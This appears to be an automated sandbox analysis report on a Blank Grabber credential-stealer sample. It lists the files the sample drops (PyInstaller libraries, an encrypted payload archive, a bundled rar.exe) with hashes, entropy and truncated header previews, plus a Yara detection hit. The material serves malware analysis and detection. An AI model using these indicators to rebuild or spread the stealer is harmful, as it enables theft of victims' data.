Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	48920
Entropy (8bit):	7.80237293184675
Encrypted:	false
SSDEEP:	768:4AZgCxM2GXvgErzHwiVGP2lhBHgdcmQYnTYf9WeW/pAHILCVjew5YiSyv3YJPxWb:4A/MZJHzVGPwRHYTiWeWCHILCVjd7SyL
MD5:	FBA120A94A072459011133DA3A989DB2
SHA1:	6568B3E9E993C7E993A699505339BBEBB5DB6FB0
SHA-256:	055A93C8B127DC840AC40CA70D4B0246AC88C9CDE1EF99267BBE904086E0B7D3
SHA-512:	221B5A2A9DE1133E2866B39F493A822060D3FB85F8C844C116F64878B9B112E8085E61D450053D859A63450D1292C13BD7EC38B89FE2DFA6684AC94E090EC3AA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .................b....................................................`..........................................{..H....y.......p....... ..,............{.......................................n..8...........................................UPX0....................................UPX1................................@....rsrc........p......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI77042\_ctypes.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59672
Entropy (8bit):	7.815495306851539
Encrypted:	false
SSDEEP:	1536:lAkx+GKRIxcWVGXWYOIDcPiBFCx/YzPILLPDM7SyGPxvI:ikx6uWX3xlBFCRYrILLPDMkxA
MD5:	31859B9A99A29127C4236968B87DBCBB
SHA1:	29B4EE82AA026C10FE8A4F43B40CBD8EC7EA71E5
SHA-256:	644712C3475BE7F02C2493D75E6A831372D01243ACA61AA8A1418F57E6D0B713
SHA-512:	FEC3AB9CE032E02C432D714DE0D764AAB83917129A5E6EECA21526B03176DA68DA08024D676BC0032200B2D2652E6D442CA2F1EF710A7408BD198995883A943A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............d...d...d.......d...e...d...a...d...`...d...g...d.d.e...d...`...d...e...d.:.e...d...e.I.d.d.i...d.d.d...d.d...d.d.f...d.Rich..d.........................PE..d.....,d.........." .............p...........................................@............`.........................................H<.......9.......0..........D............<.......................................%..8...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI77042\_decimal.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	109336
Entropy (8bit):	7.935778322595252
Encrypted:	false
SSDEEP:	3072:bIUqPfSKN4sAaLojnvWxbpdNPyspILOqlJSgxDM:bllIMWxpdNP0J3M
MD5:	7CDC590AC9B4FFA52C8223823B648E5C
SHA1:	C8D9233ACBFF981D96C27F188FCDE0E98CDCB27C
SHA-256:	F281BD8219B4B0655E9C3A5516FE0B36E44C28B0AC9170028DD052CA234C357C
SHA-512:	919C36BE05F5F94EC84E68ECCA43C7D43ACB8137A043CF429A9E995643CA69C4C101775955E36C15F844F64FC303999DA0CBFE5E121EB5B3FFB7D70E3CD08E0B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....p...................................................0............`..........................................,..P....)....... ...........'...........-..........................................8...........................................UPX0....................................UPX1.....p.......j..................@....rsrc........ .......n..............@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI77042\_hashlib.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36120
Entropy (8bit):	7.666263818459696
Encrypted:	false
SSDEEP:	768:ZkmOGHOaDC16x5fWN9/xx5qFp6OILOIeQ5YiSyv/UPxWElHBT:LfHOcCyO/Rq6OILOIeC7SyEPxDF
MD5:	659A5EFA39A45C204ADA71E1660A7226
SHA1:	1A347593FCA4F914CFC4231DC5F163AE6F6E9CE0
SHA-256:	B16C0CC3BAA67246D8F44138C6105D66538E54D0AFB999F446CAE58AC83EF078
SHA-512:	386626B3BAD58B450B8B97C6BA51CE87378CDDF7F574326625A03C239AA83C33F4D824D3B8856715F413CFB9238D23F802F598084DBD8C73C8F6C61275FDECB5
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P.........../.......................................P............`..........................................K..P....I.......@.......................K.......................................;..8...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........@.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI77042\_lzma.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	87832
Entropy (8bit):	7.91873819228598
Encrypted:	false
SSDEEP:	1536:wZ6by758mldpnwpd+cjwZaO4jA5e0RBcS8iGyfowoQmXsoILZ14T7SyiPxq:O7HdSpd+co4AhRiXT8aILZ14TIxq
MD5:	864B22495372FA4D8B18E1C535962AE2
SHA1:	8CFAEE73B7690B9731303199E3ED187B1C046A85
SHA-256:	FC57BD20B6B128AFA5FAAAC1FD0CE783031FAAF39F71B58C9CACF87A16F3325F
SHA-512:	9F26FE88ACA42C80EB39153708B2315A4154204FC423CA474860072DD68CCC00B7081E8ADB87EF9A26B9F64CD2F4334F64BC2F732CD47E3F44F6CF9CC16FA187
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." ..... ...............................................................`.........................................4...L....................@.........................................................8...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI77042\_queue.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26392
Entropy (8bit):	7.451874097949462
Encrypted:	false
SSDEEP:	768:9Oa1OtK/srvmpp1ILQUe+5YiSyvz5PxWEaAc:cMV/X1ILQUe07SydPxDc
MD5:	BEBC7743E8AF7A812908FCB4CDD39168
SHA1:	00E9056E76C3F9B2A9BABA683EAA52ECFA367EDB
SHA-256:	CC275B2B053410C6391339149BAF5B58DF121A915D18B889F184BE02BEDAF9BC
SHA-512:	C56496C6396B8C3EC5EC52542061B2146EA80D986DFE13B0D4FEB7B5953C80663E34CCD7B7EE99C4344352492BE93F7D31F7830EC9EC2CA8A0C2055CB18FA8DB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a............................................V...................V......V......V......V......Rich....................PE..d.....,d.........." .....0................................................................`.............................................L.......P............`..............<...........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI77042\_socket.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	43800
Entropy (8bit):	7.716600949168409
Encrypted:	false
SSDEEP:	768:Qp4KUJsCditRTPL/f9hpDd1ciTceZS/VgpjrpILLwjm/5YiSyv6PxWEads:QpghditRDL/1rcOcT/V4rpILLwjmx7Sd
MD5:	49F87AEC74FEA76792972022F6715C4D
SHA1:	ED1402BB0C80B36956EC9BAF750B96C7593911BD
SHA-256:	5D8C8186DF42633679D6236C1FEBF93DB26405C1706F9B5D767FEAB440EA38B0
SHA-512:	DE58D69228395827547E07695F70EF98CDAF041EBAAE0C3686246209254F0336A589B58D44B7776CCAE24A5BC03B9DC8354C768170B1771855F342EECC5FEAD4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~...:...:...:...3.i.<...h...8...h...6...h...2...h...9.......8...:.......q...=.......;.......;.......;.......;...Rich:...........PE..d.....,d.........." .....p...........k....................................................`.............................................P.......h............ ..<...........X........................................w..8...........................................UPX0....................................UPX1.....p.......j..................@....rsrc................n..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI77042\_sqlite3.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	51480
Entropy (8bit):	7.7600775531574655
Encrypted:	false
SSDEEP:	1536:44+FRSaAh0lhSoqx1HuILOQzM7SywcPxC:4CMA0ILOQzMWMxC
MD5:	70A7050387359A0FAB75B042256B371F
SHA1:	5FFC6DFBADDB6829B1BFD478EFFB4917D42DFF85
SHA-256:	E168A1E229F57248253EAD19F60802B25DC0DBC717C9776E157B8878D2CA4F3D
SHA-512:	154FD26D4CA1E6A85E3B84CE9794A9D1EF6957C3BBA280D666686A0F14AA571AAEC20BAA0E869A78D4669F1F28EA333C0E9E4D3ECD51B25D34E46A0EF74EE735
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........V/\.8\|\.8\|\.8\|U..\|Z.8\|..9}^.8\|:..\|].8\|..=}P.8\|..<}T.8\|..;}_.8\|..9}Y.8\|..9}^.8\|\.9\|..8\|..5}U.8\|..8}].8\|...\|].8\|..:}].8\|Rich\.8\|................PE..d...#.,d.........." .............@.......P................................................`.............................................P.......4............`..D...........(...........................................8...........................................UPX0.....@..............................UPX1.........P......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI77042\_ssl.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	63768
Entropy (8bit):	7.844124998607476
Encrypted:	false
SSDEEP:	1536:cww8TGrTNdinN5kuAQZMXb4zdILC74+67SykPx1:FPTGrTmN5kHQZMXc5ILC74Tax1
MD5:	9A7AB96204E505C760921B98E259A572
SHA1:	39226C222D3C439A03EAC8F72B527A7704124A87
SHA-256:	CAE09BBBB12AA339FD9226698E7C7F003A26A95390C7DC3A2D71A1E540508644
SHA-512:	0F5F58FB47379B829EE70C631B3E107CDE6A69DC64E4C993FB281F2D5ADA926405CE29EA8B1F4F87ED14610E18133932C7273A1AA209A0394CC6332F2ABA7E58
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C.-...-...-.....-...,...-...(...-...)...-.......-.W.,...-.R.,...-...,...-...,...-.W. ...-.W.-...-.W....-.W./...-.Rich..-.................PE..d.....,d.........." ......................................................................`.........................................p...d....................P..........................................................8...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	880569
Entropy (8bit):	5.682993312079324
Encrypted:	false
SSDEEP:	12288:cgYJu4KXWyBC6S4IEa8A4a2YWD3dOVwx/fpEWertSLMN+:cgYJiVBFLa2VIVwx/fpEWe+MN+
MD5:	C4989BCEB9E7E83078812C9532BAEEA7
SHA1:	AAFB66EBDB5EDC327D7CB6632EB80742BE1AD2EB
SHA-256:	A0F5C7F0BAC1EA9DC86D60D20F903CC42CFF3F21737426D69D47909FC28B6DCD
SHA-512:	FB6D431D0F2C8543AF8DF242337797F981D108755712EC6C134D451AA777D377DF085B4046970CC5AC0991922DDF1F37445A51BE1A63EF46B0D80841222FB671
Malicious:	false
Reputation:	unknown
Preview:	PK..........!..,..5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Ze..Ze.e..Z+e.,....[d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d..de8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF

C:\Users\user\AppData\Local\Temp\_MEI77042\blank.aes

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	54887
Entropy (8bit):	7.783861829315629
Encrypted:	false
SSDEEP:	1536:i/APzrmUbD3as0dfiKQZfjycSjN/u7uc8r:i4/mU/3LfjjSjN+O
MD5:	1D2E094945207E0BD578D3BE2565BDFA
SHA1:	0F743CE7A2E1D8468F7EF170F5A88C338EA0D008
SHA-256:	6B4459E374720E7D3678E8E9DE623DDEDAB374A4595635FC6543FFC55373FD5D
SHA-512:	133B50F43088D63B111E551EDCF9D5064AC7105C8780EFD72DB55A06E34003B40CEAD7C35097AB7D8067E5F2D069ADD7A886E079733C9D51102BD8FD483D98C9
Malicious:	false
Reputation:	unknown
Preview:	PK.........].X................stub-o.pyco........8.f.........................@...sl...e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.d.d...Z.d.Z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e...Z.z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e...........pie.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............d.....W.nA..e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d...............y.......Y.n.w.G.d.d...d...Z.d.S.)....b....a....s....e....6....4.....r.

C:\Users\user\AppData\Local\Temp\_MEI77042\libcrypto-1_1.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1112856
Entropy (8bit):	7.937513332106868
Encrypted:	false
SSDEEP:	24576:AfVpBeOErQiWG03fz7UuJ7G/y1Pcg8rWgrnNFF+EoIFAVMBU1CPwDv3uFfJN:4pBejNWGoXFJ7ay14rWgrnNxoIFAy+1Y
MD5:	BBC1FCB5792F226C82E3E958948CB3C3
SHA1:	4D25857BCF0651D90725D4FB8DB03CCADA6540C3
SHA-256:	9A36E09F111687E6B450937BB9C8AEDE7C37D598B1CCCC1293EED2342D11CF47
SHA-512:	3137BE91F3393DF2D56A3255281DB7D4A4DCCD6850EEB4F0DF69D4C8DDA625B85D5634FCE49B195F3CC431E2245B8E9BA401BAAA08778A467639EE4C1CC23D8D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..........&..n5...&...................................7...........`......................................... .5.......5.h.....5.......2...............7......................................z5.@...........................................UPX0......&.............................UPX1..........&.....................@....rsrc.........5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI77042\libffi-7.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	24088
Entropy (8bit):	7.527291720504194
Encrypted:	false
SSDEEP:	384:hRZBxuj5W4IBzuU2CUvOEvba4Za7gJXkrZRCXEpnYPLxDG4y80uzFLhHj:rwlGuUm2Evb1p07pWDG4yKRF
MD5:	6F818913FAFE8E4DF7FEDC46131F201F
SHA1:	BBB7BA3EDBD4783F7F973D97B0B568CC69CADAC5
SHA-256:	3F94EE4F23F6C7702AB0CC12995A6457BF22183FA828C30CC12288ADF153AE56
SHA-512:	5473FE57DC40AF44EDB4F8A7EFD68C512784649D51B2045D570C7E49399990285B59CFA6BCD25EF1316E0A073EA2A89FE46BE3BFC33F05E3333037A1FD3A6639
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....@................................................................`.........................................................................................................................................................................UPX0....................................UPX1.....@.......:..................@...UPX2.................>..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI77042\libssl-1_1.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	209688
Entropy (8bit):	7.925861479415686
Encrypted:	false
SSDEEP:	3072:He9fHP8SzrOGFIXkUNNlvBK8Tg111WMEGf0+fGYahm8YNIqepRLvwdlMrQk/OlfJ:+99u/XRxpK8M111nEE0iGYziqGdvwLeO
MD5:	AD0A2B4286A43A0EF05F452667E656DB
SHA1:	A8835CA75768B5756AA2445CA33B16E18CEACB77
SHA-256:	2AF3D965863018C66C2A9A2D66072FE3657BBD0B900473B9BBDCAC8091686AE1
SHA-512:	CCEB5EC1DD6D2801ABBACD6112393FECBF5D88FE52DB86CFC98F13326C3D3E31C042B0CC180B640D0F33681BDD9E6A355DC0FBFDE597A323C8D9E88DE40B37C4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1}q.1}q.1}q.8..=}q.~.p.3}q.z.p.3}q.~.t.=}q.~.u.9}q.~.r.5}q...p.2}q.1}p..\|q...u..}q...q.0}q.....0}q...s.0}q.Rich1}q.........PE..d......c.........." ...".....P...`.......p................................................`..........................................6..4@...3.......0...........N...........v.......................................&..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI77042\python310.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1514776
Entropy (8bit):	7.99244120733247
Encrypted:	true
SSDEEP:	24576:AqrG9EWpLjdwiANNmpsWKCixQvvkZVqezQv4ivFf1BiuY1Gb+Dyl3/lJYjhYPkm9:A9xdvANw3J72q016ie6Ds/lJYjhq/
MD5:	4A6AFA2200B1918C413D511C5A3C041C
SHA1:	39CA3C2B669ADAC07D4A5EB1B3B79256CFE0C3B3
SHA-256:	BEC187F608507B57CF0475971BA646B8AB42288AF8FDCF78BCE25F1D8C84B1DA
SHA-512:	DBFFB06FFFF0542200344EA9863A44A6F1E1B783379E53DF18580E697E8204D3911E091DEB32A9C94B5599CDD54301B705B74E1F51104151CF13B89D57280A20
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." ..... .......P/..jE..`/..................................`F...........`...........................................E.......E.d.....E......`B..............PF......................................vE.8...........................................UPX0.....P/.............................UPX1..... ...`/.....................@....rsrc.........E.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI77042\rar.exe

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	630736
Entropy (8bit):	6.409476333013752
Encrypted:	false
SSDEEP:	12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:	9C223575AE5B9544BC3D69AC6364F75E
SHA1:	8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:	90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:	57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI77042\rarreg.key

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	456
Entropy (8bit):	4.447296373872587
Encrypted:	false
SSDEEP:	12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:	4531984CAD7DACF24C086830068C4ABE
SHA1:	FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:	58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:	00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI77042\rarreg.key, Author: Joe Security
Reputation:	unknown
Preview:	RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

C:\Users\user\AppData\Local\Temp\_MEI77042\select.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26392
Entropy (8bit):	7.406438297877472
Encrypted:	false
SSDEEP:	384:7iRf5SV1a/KjrtZa7gJXEOBILQGe6vHQIYiSy1pCQ6wYPxh8E9VF0NyvrO:7GxSVQiVpUOBILQGek5YiSyvrYPxWEl6
MD5:	B6DE7C98E66BDE6ECFFBF0A1397A6B90
SHA1:	63823EF106E8FD9EA69AF01D8FE474230596C882
SHA-256:	84B2119ED6C33DFBDF29785292A529AABBF75139D163CFBCC99805623BB3863C
SHA-512:	1FC26E8EDC447D87A4213CB5DF5D18F990BBA80E5635E83193F2AE5368DD88A81FDDFB4575EF4475E9BF2A6D75C5C66C8ED772496FFA761C0D8644FCF40517CA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .....0...............................................................`......................................... ...L....................`..............l..........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI77042\sqlite3.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	637208
Entropy (8bit):	7.9938769843425055
Encrypted:	true
SSDEEP:	12288:cgQcg1GTl88t0wK2F/vqa544fHQ8+f9qwSKjxC785HhqNFAKNiyxWS/:cgduil88t7Ksa0DfHQzUKjxC7EhqNFA+
MD5:	0C4996047B6EFDA770B03F8F231E39B8
SHA1:	DFFCABCD4E950CC8EE94C313F1A59E3021A0AD48
SHA-256:	983F31BC687E0537D6028A9A65F4825CC560BBF3CB3EB0D3C0FCC2238219B5ED
SHA-512:	112773B83B5B4B71007F2668B0344BF45DB03BBE1F97AE738615F3C4E2F8AFB54B3AE095EA1131BF858DDFB1E585389658AF5DB56561609A154AE6BB80DC79BA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.v....@...@...@...@...@I..A...@I..A...@I..A...@I..A...@P..A...@...@...@..A...@..A...@..@...@..A...@Rich...@........PE..d.....,d.........." .....`...0.......Z....................................................`..........................................{..."...x.......p.......0..L....................................................f..8...........................................UPX0....................................UPX1.....`.......X..................@....rsrc....0...p.......\..............@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI77042\unicodedata.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	296728
Entropy (8bit):	7.985011478309557
Encrypted:	false
SSDEEP:	6144:UcNGPr86AeT4HbUO2GkYmuUuQG1a7kj04fuNPYn/VoR4:UcNGz86iHbUORk+D1a7kLWNwna4
MD5:	C697DC94BDF07A57D84C7C3AA96A2991
SHA1:	641106ACD3F51E6DB1D51AA2E4D4E79CF71DC1AB
SHA-256:	58605600FDAAFBC0052A4C1EB92F68005307554CF5AD04C226C320A1C14F789E
SHA-512:	4F735678B7E38C8E8B693593696F9483CF21F00AEA2A6027E908515AA047EC873578C5068354973786E9CFD0D25B7AB1DD6CBB1B97654F202CBB17E233247A61
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)\|.K(.eJ)..K(.eJ).eK).eJ)\|.G(.eJ)\|.J(.eJ)\|..).eJ)\|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....P...........V... ................................................`..........................................{..X....y.......p..........H............{.......................................b..8...........................................UPX0....................................UPX1.....P... ...F..................@....rsrc........p.......J..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gdejmsd.t0f.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
